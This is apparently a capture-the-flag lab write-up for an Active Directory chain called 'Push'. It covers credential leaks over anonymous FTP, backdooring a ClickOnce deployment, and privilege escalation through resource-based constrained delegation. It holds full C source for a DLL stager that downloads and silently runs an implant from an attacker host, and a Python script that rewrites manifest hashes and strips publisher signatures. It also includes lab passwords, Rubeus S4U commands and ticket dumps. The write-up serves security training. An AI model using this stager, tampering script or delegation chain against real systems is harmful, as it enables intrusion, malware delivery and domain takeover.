Push (Chain)
Machine information

Credentials
olivia.wood : DeployTrust07 (Domain User) - leaked in a .git-credentials file on the anonymous FTP service of MS01
kelly.hill : ShinraTensei! (Domain User) - found in a .git-credential file in the user's profile on MS01
sccadmin : 7ujm&UJM (Domain User, authenticates during SCCM client push) - NTLMv2 response captured via SCCM client push coercion and cracked
✅ Valid Usernames
Administrator
Guest
krbtgt
svcsql
Michelle.Randall
Olivia.Wood
Declan.Hall
Lauren.Saunders
Sharon.Mitchell
Sheila.Stokes
Kathleen.Horton
Melissa.Murray
Amber.Robson
Kelly.Hill
Michelle.Dale
Alice.Young
Allan.Little
Charlotte.Reed
Barry.Murphy
Oliver.Lowe
Charles.Barber
Colin.Brown
Aaron.May
Hilary.Simpson
Leanne.Wilson
Stanley.Sharp
Mohamed.Patel
Ashley.Holden
Lewis.Wood
Bruce.Ali
Danny.Savage
Paige.Finch
Brian.Berry
Connor.James
sccadmin
🔑 Passwords list
DeployTrust07
ShinraTensei!
7ujm&UJM
Password Policy
Minimum password length: 7
Password history length: 24
Maximum password age: 41 days 23 hours 53 minutes
Password Complexity Flags: 000001
Domain Refuse Password Change: 0
Domain Password Store Cleartext: 0
Domain Password Lockout Admins: 0
Domain Password No Clear Change: 0
Domain Password No Anon Change: 0
Domain Password Complex: 1
Minimum password age: 1 day 4 minutes
Reset Account Lockout Counter: 10 minutes
Locked Account Duration: 10 minutes
Account Lockout Threshold: None
Forced Log off Time: Not Set
Information Gathering
DC01.push.vl
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-12 09:45:12Z)
135/tcp open msrpc Microsoft Windows
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: push.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.push.vl
| Subject Alternative Name: DNS:DC01.push.vl
| Issuer: commonName=DC01.push.vl
443/tcp open ssl/https
|_ssl-date: TLS randomness does not represent time
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=DC01.push.vl
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: PUSH
| NetBIOS_Domain_Name: PUSH
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: push.vl
| DNS_Computer_Name: DC01.push.vl
| DNS_Tree_Name: push.vl
| Product_Version: 10.0.20348
|_ System_Time: 2023-10-12T09:35:36+00:00
| ssl-cert: Subject: commonName=DC01.push.vl
| Issuer: commonName=DC01.push.vl
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
61236/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
61265/tcp open msrpc Microsoft Windows RPC
MS01.push.vl
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 08-03-23 08:49PM <DIR> .config
| 08-03-23 08:49PM <DIR> .git
|_08-03-23 08:49PM <DIR> dev
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: SelfService
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-10-12T09:36:17+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: PUSH
| NetBIOS_Domain_Name: PUSH
| NetBIOS_Computer_Name: MS01
| DNS_Domain_Name: push.vl
| DNS_Computer_Name: MS01.push.vl
| DNS_Tree_Name: push.vl
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
Service enumeration
DC01
DNS
Not vulnerable to AXFR
SMB
Domain SID: S-1-5-21-1451457175-172047642-1427519037
NetBIOS: DC01
Domain: push.vl
FQDN: DC01.push.vl
SMB signing: true
Server allows null session authentication
HTTP/S
Default IIS website
MS01
FTP
Anonymous FTP login allowed
SMB
SMB signing: false (vulnerable to NTLM relay)
HTTP
ClickOnce is a Microsoft deployment technology for installing and running Windows applications with minimal user interaction, typically launched from a URL or a file share. A deployment is described by a .application file and an application .manifest that record the size and SHA-256 digest of every file and optionally carry a publisher signature; whether a modified deployment is accepted therefore depends on the publisher's signing configuration and the client's trust policy rather than on the runtime itself.

Domain
No AS-REP roastable users
No Kerberoastable users
User olivia.wood: READ,WRITE on the wwwroot share of MS01
coerce_plus
VULNERABLE, DFSCoerce
VULNERABLE, PetitPotam
VULNERABLE, PrinterBug
VULNERABLE, MSEven
Spooler service enabled
WebDAV client not enabled
ADCS: PKI Enrollment Server (enterprise CA) found on MS01.push.vl
LDAP
LDAP Signing NOT Enforced!
LDAPS Channel Binding is set to "NEVER"
MachineAccountQuota: 10
Compromise MS01 Server
Download FTP files
❯ wget -m --no-passive ftp://ftp:ftp@MS01.PUSH.VL
File: .git-credentials
--------------------------------------------
https://olivia.wood:DeployTrust07@github.com
Discovering excessive permission on folder
❯ nxc smb MS01 -u 'olivia.wood' -p 'DeployTrust07' --shares
SMB 10.10.230.150 445 MS01 [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:push.vl) (signing:False) (SMBv1:False)
SMB 10.10.230.150 445 MS01 [+] push.vl\olivia.wood:DeployTrust07
SMB 10.10.230.150 445 MS01 [*] Enumerated shares
SMB 10.10.230.150 445 MS01 Share Permissions Remark
SMB 10.10.230.150 445 MS01 ----- ----------- ------
SMB 10.10.230.150 445 MS01 ADMIN$ Remote Admin
SMB 10.10.230.150 445 MS01 C$ Default share
SMB 10.10.230.150 445 MS01 IPC$ READ Remote IPC
SMB 10.10.230.150 445 MS01 wwwroot READ,WRITE clickonce application dev share
Abusing ClickOnce to gain initial access
During enumeration the tester found a ClickOnce application (SelfService) served from the wwwroot share on MS01, the same share on which olivia.wood has READ,WRITE. Because the deployment manifests pin every file by size and SHA-256 digest, backdooring it means replacing the DLL, recomputing those values and stripping the publisher signature; the next launch of the application then runs the tester's payload and yields an implant session on MS01.
Interesting blog: Backdooring ClickOnce .NET Apps for Initial Access: A Practical Example
Creating the malicious DLL payload
To backdoor the ClickOnce deployment, the tester built a DLL that downloads and launches a Sliver implant when it is loaded. The download is waited on before the implant is started, otherwise CreateProcessA races the curl transfer and fails because the file does not exist yet:
#include <windows.h>

// Stager dropped on the share as SelfService.dll.deploy. The listener
// (10.8.5.48:8081) and implant name are the ones used in this engagement.
static BOOL RunHidden(LPSTR cmdline, BOOL wait)
{
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESHOWWINDOW;   // keep the console window hidden
    si.wShowWindow = SW_HIDE;
    ZeroMemory(&pi, sizeof(pi));
    if (!CreateProcessA(NULL, cmdline, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi))
        return FALSE;
    if (wait)
        WaitForSingleObject(pi.hProcess, 60000);   // the download must finish before we execute it
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return TRUE;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    if (fdwReason == DLL_PROCESS_ATTACH) {
        DisableThreadLibraryCalls(hinstDLL);
        // CreateProcessA needs a writable command line, hence char arrays
        char download[] = "cmd.exe /c curl 10.8.5.48:8081/http-vulnlabs-4444.exe -o C:\\Windows\\Temp\\http-vulnlabs-4444.exe";
        char implant[]  = "C:\\Windows\\Temp\\http-vulnlabs-4444.exe";
        if (RunHidden(download, TRUE))
            RunHidden(implant, FALSE);
    }
    return TRUE;
}
Compiling DLL on Linux
x86_64-w64-mingw32-gcc -shared -o SelfService.dll.deploy payload.c -lws2_32
Calculating the size and SHA-256 hash of the DLL for the manifest file
stat -c%s SelfService.dll.deploy
openssl dgst -binary -sha256 SelfService.dll.deploy | openssl enc -base64
Editing SelfService.dll.manifest
<file name="SelfService.dll" size="SIZE">
<hash>
<dsig:Transforms>
<dsig:Transform Algorithm="urn:schemas-microsoft-com:HashTransforms.Identity" />
</dsig:Transforms>
<dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha256" />
<dsig:DigestValue>HASH_BASE64</dsig:DigestValue>
</hash>
</file>
Removing the signature and publisherIdentity tags:
<publisherIdentity ... />
<Signature>...</Signature>
Changing the publicKeyToken to 0000000000000000:
<assemblyIdentity ... publicKeyToken="0000000000000000" ... />
Recalculating the size and hash of the edited .manifest file
stat -c%s SelfService.dll.manifest
openssl dgst -binary -sha256 SelfService.dll.manifest | openssl enc -base64
Editing SelfService.application
Update the size and dsig:DigestValue of the SelfService.dll.manifest entry with the values just computed, set publicKeyToken="0000000000000000" on both assemblyIdentity elements, and remove the signature and publisherIdentity tags as before.
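The manifest surgery above is mechanical and easy to get wrong by hand: a stale size or digest makes the ClickOnce runtime refuse the file. The Python script below is an added example for this write-up, not a tool from the original post. It applies the same four edits (new size, new base64 SHA-256 DigestValue, publicKeyToken zeroed on every assemblyIdentity, publisherIdentity and Signature removed) and runs the two stages in order, the .dll.manifest first and then the .application against the exact bytes of the patched manifest. The two embedded manifests are constructed, trimmed stand-ins for SelfService.dll.manifest and SelfService.application; real files carry more elements but the same file/hash structure.

```python
import base64
import hashlib
import xml.etree.ElementTree as ET

ASMV1 = "urn:schemas-microsoft-com:asm.v1"
ASMV2 = "urn:schemas-microsoft-com:asm.v2"
DSIG = "http://www.w3.org/2000/09/xmldsig#"
ZERO_TOKEN = "0000000000000000"

HASH_BLOCK = """<hash>
  <dsig:Transforms><dsig:Transform Algorithm="urn:schemas-microsoft-com:HashTransforms.Identity" /></dsig:Transforms>
  <dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha256" />
  <dsig:DigestValue>OLD</dsig:DigestValue>
</hash>"""

# Constructed, trimmed stand-ins for SelfService.dll.manifest and SelfService.application.
SAMPLE_DLL_MANIFEST = f"""<asmv1:assembly xmlns:asmv1="{ASMV1}" xmlns="{ASMV2}" xmlns:dsig="{DSIG}" manifestVersion="1.0">
  <assemblyIdentity name="SelfService" version="1.0.0.0" publicKeyToken="a1b2c3d4e5f60718" type="win32" />
  <file name="SelfService.dll" size="1000">{HASH_BLOCK}</file>
  <publisherIdentity name="CN=Push" issuerKeyHash="00" />
  <Signature xmlns="{DSIG}"><SignedInfo /></Signature>
</asmv1:assembly>"""

SAMPLE_APPLICATION = f"""<asmv1:assembly xmlns:asmv1="{ASMV1}" xmlns="{ASMV2}" xmlns:dsig="{DSIG}" manifestVersion="1.0">
  <assemblyIdentity name="SelfService.application" version="1.0.0.0" publicKeyToken="a1b2c3d4e5f60718" type="win32" />
  <dependency><dependentAssembly dependencyType="install" codebase="SelfService.dll.manifest" size="2000">
    <assemblyIdentity name="SelfService" version="1.0.0.0" publicKeyToken="a1b2c3d4e5f60718" type="win32" />{HASH_BLOCK}
  </dependentAssembly></dependency>
  <publisherIdentity name="CN=Push" issuerKeyHash="00" />
  <Signature xmlns="{DSIG}"><SignedInfo /></Signature>
</asmv1:assembly>"""


def _local(tag: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tag names."""
    return tag.rsplit("}", 1)[-1]


def file_digest(data: bytes):
    """Size and base64(sha256), exactly what the stat / openssl steps above produce."""
    return len(data), base64.b64encode(hashlib.sha256(data).digest()).decode()


def patch_manifest(manifest_xml: str, target: str, target_bytes: bytes) -> dict:
    """Re-pin `target` (a <file name=...> or <dependentAssembly codebase=...> entry) to target_bytes,
    zero every publicKeyToken and drop publisherIdentity/Signature."""
    root = ET.fromstring(manifest_xml)
    parent = {child: p for p in root.iter() for child in p}
    size, digest = file_digest(target_bytes)
    digests = tokens = removed = 0
    for el in root.iter():
        name = _local(el.tag)
        if (name == "file" and el.get("name") == target) or \
           (name == "dependentAssembly" and el.get("codebase") == target):
            el.set("size", str(size))
            for dv in el.iter():
                if _local(dv.tag) == "DigestValue":
                    dv.text = digest
                    digests += 1
        elif name == "assemblyIdentity" and "publicKeyToken" in el.attrib:
            el.set("publicKeyToken", ZERO_TOKEN)
            tokens += 1
    for el in [e for e in root.iter() if _local(e.tag) in ("publisherIdentity", "Signature")]:
        parent[el].remove(el)
        removed += 1
    for prefix, uri in (("asmv1", ASMV1), ("", ASMV2), ("dsig", DSIG)):
        ET.register_namespace(prefix, uri)   # keep the original prefixes on output
    return {"xml": ET.tostring(root, encoding="unicode"), "size": size, "digest": digest,
            "digests_updated": digests, "tokens_zeroed": tokens, "elements_removed": removed}


def backdoor_chain(dll_bytes: bytes) -> dict:
    """Stage 1 pins the DLL in the .manifest; stage 2 pins the patched .manifest bytes in the .application."""
    stage1 = patch_manifest(SAMPLE_DLL_MANIFEST, "SelfService.dll", dll_bytes)
    manifest_bytes = stage1["xml"].encode("utf-8")   # hash the exact bytes you will upload
    stage2 = patch_manifest(SAMPLE_APPLICATION, "SelfService.dll.manifest", manifest_bytes)
    return {"manifest": stage1, "application": stage2}


if __name__ == "__main__":
    result = backdoor_chain(b"MZ\x90\x00constructed-fake-dll")
    print(result["manifest"]["xml"])
    print(result["application"]["xml"])
```

The manifest entry keeps name="SelfService.dll" even though the file on the share is SelfService.dll.deploy, as in the manual steps; write the two returned xml strings out as-is, since stage 2 hashed exactly those bytes.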

Discovering kelly.hill's plaintext credentials
sliver (http-vulnlabs-4444) > ls
C:\Users\kelly.hill (31 items, 2.2 MiB)
=======================================
-rw-rw-rw- .git-credential 43 B Sat Aug 05 10:07:54 +0000 2023
<SNIP> <dir> Sat Sep 02 10:20:48 +0000 2023
sliver (http-vulnlabs-4444) > cat .git-credential
https://kelly.hill:ShinraTensei!@github.com
Path 1: Privilege escalation on MS01 via RBCD (Windows)

Abusing Resource-Based Constrained Delegation
This works because MachineAccountQuota is 10 (any domain user may add up to ten machine accounts) and kelly.hill can write msDS-AllowedToActOnBehalfOfOtherIdentity on the MS01 computer object, as the successful Set-DomainObject below shows. The new machine account is then allowed to impersonate any user to services on MS01 via S4U2self and S4U2proxy.
sliver (http-vulnlabs-4444) > execute-assembly /home/Intrusionz3r0/Documents/Tools/Sharpmad.exe MAQ -Action new -MachineAccount z3r0 -MachinePassword Password123
[*] Output:
[+] Machine account z3r0 added
sliver (http-vulnlabs-4444) > shell
PS C:\Temp> Import-Module .\PowerView.ps1
PS C:\Temp> $ComputerSid = Get-DomainComputer z3r0 -Properties objectsid | Select -Expand objectsid
PS C:\Temp> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
PS C:\Temp> $SDBytes = New-Object byte[] ($SD.BinaryLength)
PS C:\Temp> $SD.GetBinaryForm($SDBytes, 0)
PS C:\Temp> $credentials = New-Object System.Management.Automation.PSCredential "PUSH\kelly.hill", (ConvertTo-SecureString "ShinraTensei!" -AsPlainText -Force)
PS C:\Temp> Get-DomainComputer MS01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Credential $credentials -Verbose
VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain
VERBOSE: [Get-Domain] Extracted domain 'PUSH' from -Credential
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC01.push.vl/DC=push,DC=vl
VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
VERBOSE: [Get-DomainObject] Extracted domain 'push.vl' from 'CN=MS01,CN=Computers,DC=push,DC=vl'
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC01.PUSH.VL/DC=push,DC=vl
VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(&(|(distinguishedname=CN=MS01,CN=Computers,DC=push,DC=vl)))
VERBOSE: [Set-DomainObject] Setting 'msds-allowedtoactonbehalfofotheridentity' to '1 0 4 128 20 0 0 0 0 0 0 0 0 0 0 0
36 0 0 0 1 2 0 0 0 0 0 5 32 0 0 0 32 2 0 0 2 0 44 0 1 0 0 0 0 0 36 0 255 1 15 0 1 5 0 0 0 0 0 5 21 0 0 0 151 122 131 86
26 61 65 10 61 54 22 85 18 14 0 0' for object 'MS01$'
Requesting TGS using S4U to impersonate Administrator
sliver (http-vulnlabs-4444) > rubeus s4u /user:z3r0$ /impersonateuser:administrator /msdsspn:cifs/MS01.push.vl /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /outfile:administrator
[*] rubeus output:
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
[*] Action: S4U
[*] Using rc4_hmac hash: 58A478135A93AC3BF058A5EA0E8FDB71
[*] Building AS-REQ (w/ preauth) for: 'push.vl\z3r0$'
[*] Using domain controller: 10.10.166.229:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFHjCCBRqgAwIBBaEDAgEWooIERTCCBEFhggQ9MIIEOaADAgEFoQkbB1BVU0guVkyiHDAaoAMCAQKh
EzARGwZrcmJ0Z3QbB3B1c2gudmyjggQHMIIEA6ADAgESoQMCAQKiggP1BIID8XJ9n/CzgAurmnc+Dyo5
yQp5wWDkBhaNYz0qWGKz4fuv9enG//t7YZEbP3dmVICd8Ibay91pyWzA7NSQZoRo1y1EWmsOnSqNoK4d
JqkLt4DumjEEUUq01Sa2z1XXn+wYfSVM7bJwYq5ruj+LbdlBIuTgpBj8Cr8cWDHImyPDCm19pmEd0BZN
EN1ZfUq7RcLbTPkSV0LBahZgXmRfZ3tRa319sG6GsP6ptc9DO3SpTdD9SL48gSKTDhGGvDOofa3v/hez
68hgIDdmRaXfC1j+0vfk6nCJcpBkBG2Y1pX+nrAC9wSnwrWc6vJF5G/mOxuUCC3woYVzjfBRCTKzuBln
J6ndm3fTqCRpE7GYFk2cVZW+MR+rLwdqy2nPaZjObDOk0cxYfwgJYB8nYgplXvSX3GzkYS8e7KM4CIIG
mNh00mEmGbc2wRVcvTObXqaIDxUL5YRo0w6lsvm4pKmo+RpFuHwaKZN12S38El2x6mzBgJBijWNtGdq/
Hwe6BDe0o12QeocQJl1L+VzIczsWCdbBHJq7AcYVIZaH0PcwEVL2KWg3RTXXdrhE4HljKHxuOfE+E9nI
LZKPmwALhtvzySW7QCK7VQCUQcL2hTqpctnUiXNPnXdtPV0xEYbQ3/rerTTnKbVTbW6PhB8C37gU6Wzf
amT4VHZlom9JsMkPSWXlwzFdKOzyBjVRMFtCQwhhIZYr5pMJ++YbNNyKv8424YbG7WliJRBNoY+8ft9R
2c42XMIVNHLxrMOMYbS1U2iv0UtC7Vjl+apIhwhfyn64zjpRDp9VhjHb2PhuH4dZiOQ9HUP2j+TjYidH
aYg35Bn3VDZy0CYMZxhMOrrcRnUvjQu0v97DzU7tLE2ZExeuxUOQhL+RRwQFlm9nq6aiH/SYI5dLzRQo
sB0Z2mdptldRw+bfYE5xFkmrNuIJybf1EfQ9Imro+N3v2kslbQfY1ayykgZl95JQ2xva/5N2qv0hokKQ
ICKKcX2aQ9eLu/Y1DQp4aQ8QvJT5s9yYR+UHKkuerRtn+/0QvdjAyEqLsIPhzp4byr/Bi/G33YcQUPt5
O7JR6o/1fwgY6J8yS/Dr6qoIWD8ZGRU/kKbQtsRipQG8KGqPiyqtNRQOzulU1a07QgJXI6kJcq5uPTtW
6TzRs7VJ2sYdbqGRu6BRH0RjbA1+4EgPGf2uYmueOLiZUh60QFD6ImFPD5CzS+QrFe2BbyKOySb0eYQn
P7D2NcPAabvyD4Xj01N4JvtH+VjGY+Imbt4mtqsVuqjut8kBwuo74DoOqMvhZ/7qoR13G5vetpaXeBwv
f/6h2cisVjiuZN3AoN8YbHRDmzfmKC1cveAcKYU2T0kxgxajgcQwgcGgAwIBAKKBuQSBtn2BszCBsKCB
rTCBqjCBp6AbMBmgAwIBF6ESBBAZPVwcrAVWoh3ahau8lJ87oQkbB1BVU0guVkyiEjAQoAMCAQGhCTAH
GwV6M3IwJKMHAwUAQOEAAKURGA8yMDI1MDUxMjA2MDI0OVqmERgPMjAyNTA1MTIxNjAyNDlapxEYDzIw
MjUwNTE5MDYwMjQ5WqgJGwdQVVNILlZMqRwwGqADAgECoRMwERsGa3JidGd0GwdwdXNoLnZs
[*] Action: S4U
[*] Building S4U2self request for: 'z3r0$@PUSH.VL'
[*] Using domain controller: DC01.push.vl (10.10.166.229)
[*] Sending S4U2self request to 10.10.166.229:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'z3r0$@PUSH.VL'
[*] base64(ticket.kirbi):
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
[*] Impersonating user 'administrator' to target SPN 'cifs/MS01.push.vl'
[*] Building S4U2proxy request for service: 'cifs/MS01.push.vl'
[*] Using domain controller: DC01.push.vl (10.10.166.229)
[*] Sending S4U2proxy request to domain controller 10.10.166.229:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/MS01.push.vl':
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
TVMwMS5wdXNoLnZs
[*] Ticket written to administrator_cifs_MS01.push.vl
[+] Ticket successfully imported!
sliver (http-vulnlabs-4444) > download administrator_cifs_MS01.push.vl
